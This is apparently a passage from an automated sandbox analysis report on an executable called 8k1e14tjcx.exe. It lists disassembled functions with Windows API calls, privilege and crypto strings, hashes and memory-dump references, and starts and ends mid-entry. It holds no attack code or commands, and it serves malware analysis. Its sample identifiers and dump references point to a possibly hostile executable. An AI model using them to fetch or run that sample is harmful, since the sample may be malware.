                                                                                                                        • Opcode Fuzzy Hash: 32818b12854ddd0b6cefff43494f78924c4ff36d0267d05517d1d358a1086215
                                                                                                                        • Instruction Fuzzy Hash: 4B01F533249214BED2114F759E09FAB775CABDFB01F214411F206BA490C6A2BA08C769
                                                                                                                        Function 00EB7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EB7E24,00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002), ref: 00EB7E93
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EB7EA6
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00EB7E24,00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002), ref: 00EB7EC9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 36ca69e7d06af4b329fc2f4538bf482c7dcda98a64b4ef1dd59d11f318e12927
                                                                                                                        • Instruction ID: e5106ba36c3ab3f20ee9678369575d5064b38ae8fc4dfc5fb0675261f129cb04
                                                                                                                        • Opcode Fuzzy Hash: 36ca69e7d06af4b329fc2f4538bf482c7dcda98a64b4ef1dd59d11f318e12927
                                                                                                                        • Instruction Fuzzy Hash: 8BF03C31A00208BFCB159BA5DC09FDEBFB5EF44715F0080A9F805B6260DB729E46CA90
                                                                                                                        Function 00E9F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E9F2E4
                                                                                                                        • GetProcAddress.KERNEL32(00ED81C8,CryptUnprotectMemory), ref: 00E9F2F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                        • Opcode ID: f49cd280bbe6eed16d68c58ae6bb546be890454d672f6f42ee51655c33c56f8d
                                                                                                                        • Instruction ID: c7944d89fbef8fb4e32526588890336027ac69c40dbebc7ab042fb6e24a4c93c
                                                                                                                        • Opcode Fuzzy Hash: f49cd280bbe6eed16d68c58ae6bb546be890454d672f6f42ee51655c33c56f8d
                                                                                                                        • Instruction Fuzzy Hash: 55E086719107419ECB209F35994DF417AD56F05704F14D82DF0DAF3650D6B7D5928B50
                                                                                                                        Function 00EB2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2252061734-0
                                                                                                                        • Opcode ID: 8c42972e00f9d153b4f8c7f22a40d9bbf66a548162015cb7fa8e9307eb269140
                                                                                                                        • Instruction ID: d00d3ffa859bb4fa123b10d3366ccac13746f36b5a810909553aa48e3829cd59
                                                                                                                        • Opcode Fuzzy Hash: 8c42972e00f9d153b4f8c7f22a40d9bbf66a548162015cb7fa8e9307eb269140
                                                                                                                        • Instruction Fuzzy Hash: BB51E072A00212AFDB298F14D845BEBB7A4FF54304F24552DEA057B2A2D732ED40DB90
                                                                                                                        Function 00EBBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00EBBF39
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBBF5C
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EBBF82
                                                                                                                        • _free.LIBCMT ref: 00EBBF95
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EBBFA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: 654a57e4025eeace8eb19d48e26843235cbfe36d0e70ff0e63b32cfbc7772af8
                                                                                                                        • Instruction ID: 6e32a6d9c60d54299aaf60fc3d748dbbe0d7e44d03964e5a1f223a2a6e9a4c79
                                                                                                                        • Opcode Fuzzy Hash: 654a57e4025eeace8eb19d48e26843235cbfe36d0e70ff0e63b32cfbc7772af8
                                                                                                                        • Instruction Fuzzy Hash: 750184727066157F232126B75C4DCFB6A6EDEC2BA53185129F944F2241EFA1CD02D5B0
                                                                                                                        Function 00EB9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00EB91AD,00EBB188,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB986E
                                                                                                                        • _free.LIBCMT ref: 00EB98A3
                                                                                                                        • _free.LIBCMT ref: 00EB98CA
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB98D7
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB98E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
                                                                                                                        • Opcode ID: 88848b5d4e0ae67bde5654233161f880ece7b5963eace8068f27b58de05e5eb6
                                                                                                                        • Instruction ID: 2ec270e3204cfb223a13e46ebadb28eab732d4697991ab294d5aee763a1f020b
                                                                                                                        • Opcode Fuzzy Hash: 88848b5d4e0ae67bde5654233161f880ece7b5963eace8068f27b58de05e5eb6
                                                                                                                        • Instruction Fuzzy Hash: EE01F4361447016FC21A23756D86DEB26AEDFD2774734213AF715B22A3EF22CD065261
                                                                                                                        Function 00EA0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA11CF: ResetEvent.KERNEL32(?), ref: 00EA11E1
                                                                                                                          • Part of subcall function 00EA11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00EA11F5
                                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00EA0F21
                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 00EA0F3B
                                                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00EA0F54
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EA0F60
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EA0F6C
                                                                                                                          • Part of subcall function 00EA0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00EA1206,?), ref: 00EA0FEA
                                                                                                                          • Part of subcall function 00EA0FE4: GetLastError.KERNEL32(?), ref: 00EA0FF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1868215902-0
                                                                                                                        • Opcode ID: 9b5a9c65572174ad5928d7b1f07aa9247b9f285d61b1526eb1a85a51b35a2673
                                                                                                                        • Instruction ID: 7b5506cd657b16743d16f4cd0925e18e083dfa62700e701192c6e72a9a453a2c
                                                                                                                        • Opcode Fuzzy Hash: 9b5a9c65572174ad5928d7b1f07aa9247b9f285d61b1526eb1a85a51b35a2673
                                                                                                                        • Instruction Fuzzy Hash: 7F015E76500744EFC7229B65DD85FC6BBA9FB08710F004929F26AB2161CB767A49CA90
                                                                                                                        Function 00EBC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EBC817
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBC829
                                                                                                                        • _free.LIBCMT ref: 00EBC83B
                                                                                                                        • _free.LIBCMT ref: 00EBC84D
                                                                                                                        • _free.LIBCMT ref: 00EBC85F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: ad43951646ecbde8da69c3abab3b6873a48801682fea6d079b282c813c4c3fd0
                                                                                                                        • Instruction ID: aac44ec4f043c5f6170df79a9806e6a5d537f7467fc9c72484362100d1489e2d
                                                                                                                        • Opcode Fuzzy Hash: ad43951646ecbde8da69c3abab3b6873a48801682fea6d079b282c813c4c3fd0
                                                                                                                        • Instruction Fuzzy Hash: F0F01232508200AF8624DB69F586C9777EDAB047587A4382AF108F7652CB71FC81CA54
                                                                                                                        Function 00EA1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EA1FE5
                                                                                                                        • _wcslen.LIBCMT ref: 00EA1FF6
                                                                                                                        • _wcslen.LIBCMT ref: 00EA2006
                                                                                                                        • _wcslen.LIBCMT ref: 00EA2014
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E9B371,?,?,00000000,?,?,?), ref: 00EA202F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CompareString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397213944-0
                                                                                                                        • Opcode ID: b722d2f1d471fcb7a8c64d8d4a84061d10cac5a2cce3c94943b825833b8a40fb
                                                                                                                        • Instruction ID: 7696ccd80b125cc2cf5d638bce7e36cb906a9bb90edb2473237a34dae4861b7a
                                                                                                                        • Opcode Fuzzy Hash: b722d2f1d471fcb7a8c64d8d4a84061d10cac5a2cce3c94943b825833b8a40fb
                                                                                                                        • Instruction Fuzzy Hash: 99F06D32008114BFCF222F65EC4ADCB3F26EB45760B11902AF61A7E062CB72E661D690
                                                                                                                        Function 00EA15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _swprintf
                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                        • API String ID: 589789837-2259941744
                                                                                                                        • Opcode ID: 1de0e4d9070617ad94bed5682e29097ef8517892ca937d3b93e09b245ad7e22d
                                                                                                                        • Instruction ID: 5de2785ba32ec33936b0549cb52c36146987a78b874b1bae5ec72fd5dd077785
                                                                                                                        • Opcode Fuzzy Hash: 1de0e4d9070617ad94bed5682e29097ef8517892ca937d3b93e09b245ad7e22d
                                                                                                                        • Instruction Fuzzy Hash: 80511D35288300F6FA251A948D46FB572A5AB4FB04F14B5C7F397BC4E2C5A2B410A71B
                                                                                                                        Function 00EB7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8k1e14tjcx.exe,00000104), ref: 00EB7FAE
                                                                                                                        • _free.LIBCMT ref: 00EB8079
                                                                                                                        • _free.LIBCMT ref: 00EB8083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                        • API String ID: 2506810119-2718635268
                                                                                                                        • Opcode ID: 7b3b7e4cb56fe03cef1de98dbcd9eab9913440760c0a8ec364e36a61df4bb3a2
                                                                                                                        • Instruction ID: 3ddb9997f30606b30571d7ca78584ce7e336c6d61b9962379e08f6926224dc61
                                                                                                                        • Opcode Fuzzy Hash: 7b3b7e4cb56fe03cef1de98dbcd9eab9913440760c0a8ec364e36a61df4bb3a2
                                                                                                                        • Instruction Fuzzy Hash: 7531AD71A00209AFDB21EF9999809EFBBFCEB94350F10506AF504B7311DB708E48CB61
                                                                                                                        Function 00EB31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EB31FB
                                                                                                                        • _abort.LIBCMT ref: 00EB3306
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EncodePointer_abort
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 948111806-2084237596
                                                                                                                        • Opcode ID: 63056a44bdc4b14cad25474d0448ae3f59927277400e33d4b8d24d690614074d
                                                                                                                        • Instruction ID: dd088f58e96259ac1e23192c5864637028682ac657e47ef61f3b7fc2cafc318b
                                                                                                                        • Opcode Fuzzy Hash: 63056a44bdc4b14cad25474d0448ae3f59927277400e33d4b8d24d690614074d
                                                                                                                        • Instruction Fuzzy Hash: 2B413871900209AFCF15DFA8DD82AEFBBB5BF48308F189159FA1476221D335AA50DB50
                                                                                                                        Function 00E97401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E97406
                                                                                                                          • Part of subcall function 00E93BBA: __EH_prolog.LIBCMT ref: 00E93BBF
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00E974CD
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                        • API String ID: 3813983858-639343689
                                                                                                                        • Opcode ID: c017846d46662388c550d98625ec1dd524b4d9702709e6d6ddfd74c778874aa6
                                                                                                                        • Instruction ID: 67052ed54c65651b4409041dfe9221c18474a17cc72af4ed6afacaa394dfe3b2
                                                                                                                        • Opcode Fuzzy Hash: c017846d46662388c550d98625ec1dd524b4d9702709e6d6ddfd74c778874aa6
                                                                                                                        • Instruction Fuzzy Hash: DA31B2B1E04248AEDF11EBA4DC46FEE7BF9AF49304F04605AF445B7282DB749A48C761
                                                                                                                        Function 00EAAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAAD98
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00EAADAD
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EAADC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
